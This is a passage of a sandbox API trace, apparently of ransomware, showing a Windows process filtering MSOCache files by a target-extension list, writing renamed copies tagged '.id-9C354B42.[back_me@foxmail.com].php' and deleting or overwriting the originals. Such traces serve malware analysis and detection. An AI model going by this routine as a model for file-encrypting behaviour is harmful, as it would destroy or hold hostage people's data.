[0041.526] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.526] SetEndOfFile (hFile=0x1a4) returned 1 [0041.535] CloseHandle (hObject=0x1a4) returned 1 [0041.535] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0041.535] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi")) returned 1 [0041.535] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.535] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.536] lstrlenW (lpString=".doc") returned 4 [0041.536] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0041.536] lstrlenW (lpString=".docx") returned 5 [0041.536] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1 [0041.536] lstrlenW (lpString=".pdf") returned 4 [0041.536] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0041.536] lstrlenW (lpString=".xls") returned 4 [0041.536] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0041.536] lstrlenW (lpString=".xlsx") returned 5 [0041.536] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1 [0041.536] lstrlenW (lpString=".ppt") returned 4 [0041.536] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0041.536] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.536] lstrlenW (lpString=".zip") returned 4 [0041.536] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0041.536] lstrlenW (lpString=".rar") returned 4 [0041.536] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0041.536] lstrlenW (lpString=".bz2") returned 4 [0041.536] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0041.536] lstrlenW (lpString=".7z") returned 3 [0041.536] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0041.536] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.536] lstrlenW (lpString=".dbf") returned 4 [0041.536] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0041.536] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.536] lstrlenW (lpString=".1cd") returned 4 [0041.536] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0041.536] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.536] lstrlenW (lpString=".jpg") returned 4 [0041.537] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0041.537] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.537] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.537] lstrlenW (lpString=".doc") returned 4 [0041.537] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0041.537] lstrlenW (lpString=".docx") returned 5 [0041.537] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1 [0041.537] lstrlenW (lpString=".pdf") returned 4 [0041.537] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0041.537] lstrlenW (lpString=".xls") returned 4 [0041.537] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0041.537] lstrlenW (lpString=".xlsx") returned 5 [0041.537] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1 [0041.537] lstrlenW (lpString=".ppt") returned 4 [0041.537] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0041.537] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.537] lstrlenW (lpString=".zip") returned 4 [0041.537] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0041.537] lstrlenW (lpString=".rar") returned 4 [0041.537] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0041.537] lstrlenW (lpString=".bz2") returned 4 [0041.537] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0041.537] lstrlenW (lpString=".7z") returned 3 [0041.537] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0041.537] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.537] lstrlenW (lpString=".dbf") returned 4 [0041.537] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0041.537] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.538] lstrlenW (lpString=".1cd") returned 4 [0041.538] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0041.538] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.538] lstrlenW (lpString=".jpg") returned 4 [0041.538] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0041.538] lstrcmpiW (lpString1=".msi", lpString2=".php") returned -1 [0041.538] lstrlenW (lpString="Proof.msi") returned 9 [0041.538] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0041.538] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=881152) returned 1 [0041.538] CloseHandle (hObject=0x1a4) returned 1 [0041.538] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi")) returned 0x2020 [0041.539] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0041.539] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0041.539] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.539] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.539] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0041.539] GetLastError () returned 0x0 [0041.539] ReadFile (in: hFile=0x1a4, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0xd7200, lpOverlapped=0x0) returned 1 [0041.811] WriteFile (in: hFile=0x1f4, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xd7210, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0xd7210, lpOverlapped=0x0) returned 1 [0041.832] ReadFile (in: hFile=0x1a4, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.832] WriteFile (in: hFile=0x1f4, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.832] SetEndOfFile (hFile=0x1f4) returned 1 [0041.832] CloseHandle (hObject=0x1f4) returned 1 [0042.125] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.125] SetEndOfFile (hFile=0x1a4) returned 1 [0042.133] CloseHandle (hObject=0x1a4) returned 1 [0042.133] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0042.134] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi")) returned 1 [0042.134] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0042.134] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0042.134] lstrlenW (lpString=".doc") returned 4 [0042.134] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0042.134] lstrlenW (lpString=".docx") returned 5 [0042.134] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1 [0042.134] lstrlenW (lpString=".pdf") returned 4 [0042.134] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0042.134] lstrlenW (lpString=".xls") returned 4 [0042.134] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0042.134] lstrlenW (lpString=".xlsx") returned 5 [0042.134] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1 [0042.134] lstrlenW (lpString=".ppt") returned 4 [0042.134] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0042.134] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0042.134] lstrlenW (lpString=".zip") returned 4 [0042.134] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0042.134] lstrlenW (lpString=".rar") returned 4 [0042.134] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0042.134] lstrlenW (lpString=".bz2") returned 4 [0042.134] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0042.134] lstrlenW (lpString=".7z") returned 3 [0042.134] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0042.134] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0042.135] lstrlenW (lpString=".dbf") returned 4 [0042.135] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0042.135] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0042.135] lstrlenW (lpString=".1cd") returned 4 [0042.135] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0042.135] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0042.135] lstrlenW (lpString=".jpg") returned 4 [0042.135] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0042.135] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0042.135] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0042.135] lstrlenW (lpString=".doc") returned 4 [0042.135] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0042.135] lstrlenW (lpString=".docx") returned 5 [0042.135] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1 [0042.135] lstrlenW (lpString=".pdf") returned 4 [0042.135] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0042.135] lstrlenW (lpString=".xls") returned 4 [0042.135] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0042.135] lstrlenW (lpString=".xlsx") returned 5 [0042.135] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1 [0042.135] lstrlenW (lpString=".ppt") returned 4 [0042.135] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0042.135] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0042.135] lstrlenW (lpString=".zip") returned 4 [0042.135] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0042.135] lstrlenW (lpString=".rar") returned 4 [0042.135] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0042.135] lstrlenW (lpString=".bz2") returned 4 [0042.135] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0042.135] lstrlenW (lpString=".7z") returned 3 [0042.135] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0042.136] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0042.136] lstrlenW (lpString=".dbf") returned 4 [0042.136] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0042.136] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0042.136] lstrlenW (lpString=".1cd") returned 4 [0042.136] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0042.136] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0042.136] lstrlenW (lpString=".jpg") returned 4 [0042.136] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0042.136] lstrcmpiW (lpString1=".cab", lpString2=".php") returned -1 [0042.136] lstrlenW (lpString="Proof.cab") returned 9 [0042.136] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0042.136] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=21064532) returned 1 [0042.136] CloseHandle (hObject=0x1a4) returned 1 [0042.136] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab")) returned 0x2020 [0042.137] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0042.137] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0042.172] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0042.172] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc6c | out: lpNewFilePointer=0x0) returned 1 [0042.172] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc2c | out: lpNewFilePointer=0x0) returned 1 [0042.172] ReadFile (in: hFile=0x1a4, lpBuffer=0x44e0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3d5fc38, lpOverlapped=0x0 | out: lpBuffer=0x44e0058*, lpNumberOfBytesRead=0x3d5fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.185] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x6b23c6, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc2c | out: lpNewFilePointer=0x0) returned 1 [0042.185] ReadFile (in: hFile=0x1a4, lpBuffer=0x4520058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3d5fc38, lpOverlapped=0x0 | out: lpBuffer=0x4520058*, lpNumberOfBytesRead=0x3d5fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.188] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x3d5fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0042.188] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x13d6b54, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc2c | out: lpNewFilePointer=0x0) returned 1 [0042.188] ReadFile (in: hFile=0x1a4, lpBuffer=0x4560058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3d5fc38, lpOverlapped=0x0 | out: lpBuffer=0x4560058*, lpNumberOfBytesRead=0x3d5fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.220] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.220] WriteFile (in: hFile=0x1a4, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x3d5fcb0, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0042.537] SetEndOfFile (hFile=0x1a4) returned 1 [0042.537] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x433d948 [0042.539] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.539] WriteFile (in: hFile=0x1a4, lpBuffer=0x433d948*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3d5fc88, lpOverlapped=0x0 | out: lpBuffer=0x433d948*, lpNumberOfBytesWritten=0x3d5fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.544] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x6b23c6, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.544] WriteFile (in: hFile=0x1a4, lpBuffer=0x433d948*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3d5fc88, lpOverlapped=0x0 | out: lpBuffer=0x433d948*, lpNumberOfBytesWritten=0x3d5fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.545] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x13d6b54, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.545] WriteFile (in: hFile=0x1a4, lpBuffer=0x433d948*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3d5fc88, lpOverlapped=0x0 | out: lpBuffer=0x433d948*, lpNumberOfBytesWritten=0x3d5fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.548] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x433d948 | out: hHeap=0xb10000) returned 1 [0042.548] CloseHandle (hObject=0x1a4) returned 1 [0045.603] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0045.603] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0045.603] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0045.603] lstrlenW (lpString=".doc") returned 4 [0045.603] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0045.603] lstrlenW (lpString=".docx") returned 5 [0045.603] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1 [0045.603] lstrlenW (lpString=".pdf") returned 4 [0045.603] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0045.603] lstrlenW (lpString=".xls") returned 4 [0045.603] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0045.603] lstrlenW (lpString=".xlsx") returned 5 [0045.603] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1 [0045.604] lstrlenW (lpString=".ppt") returned 4 [0045.604] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0045.604] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0045.604] lstrlenW (lpString=".zip") returned 4 [0045.604] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0045.604] lstrlenW (lpString=".rar") returned 4 [0045.604] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0045.604] lstrlenW (lpString=".bz2") returned 4 [0045.604] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0045.604] lstrlenW (lpString=".7z") returned 3 [0045.604] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0045.604] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0045.604] lstrlenW (lpString=".dbf") returned 4 [0045.604] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0045.604] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0045.604] lstrlenW (lpString=".1cd") returned 4 [0045.604] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0045.604] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0045.604] lstrlenW (lpString=".jpg") returned 4 [0045.604] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0045.604] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0045.604] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0045.604] lstrlenW (lpString=".doc") returned 4 [0045.604] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0045.604] lstrlenW (lpString=".docx") returned 5 [0045.604] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1 [0045.604] lstrlenW (lpString=".pdf") returned 4 [0045.604] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0045.604] lstrlenW (lpString=".xls") returned 4 [0045.604] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0045.604] lstrlenW (lpString=".xlsx") returned 5 [0045.604] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1 [0045.604] lstrlenW (lpString=".ppt") returned 4 [0045.604] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0045.605] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0045.605] lstrlenW (lpString=".zip") returned 4 [0045.605] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0045.605] lstrlenW (lpString=".rar") returned 4 [0045.605] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0045.605] lstrlenW (lpString=".bz2") returned 4 [0045.605] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0045.605] lstrlenW (lpString=".7z") returned 3 [0045.605] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0045.605] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0045.605] lstrlenW (lpString=".dbf") returned 4 [0045.605] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0045.605] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0045.605] lstrlenW (lpString=".1cd") returned 4 [0045.605] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0045.605] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0045.605] lstrlenW (lpString=".jpg") returned 4 [0045.605] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0045.605] lstrcmpiW (lpString1=".msi", lpString2=".php") returned -1 [0045.605] lstrlenW (lpString="ProjectMUI.msi") returned 14 [0045.605] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0045.989] GetFileSizeEx (in: hFile=0x1e8, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=2511872) returned 1 [0045.989] CloseHandle (hObject=0x1e8) returned 1 [0045.990] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all 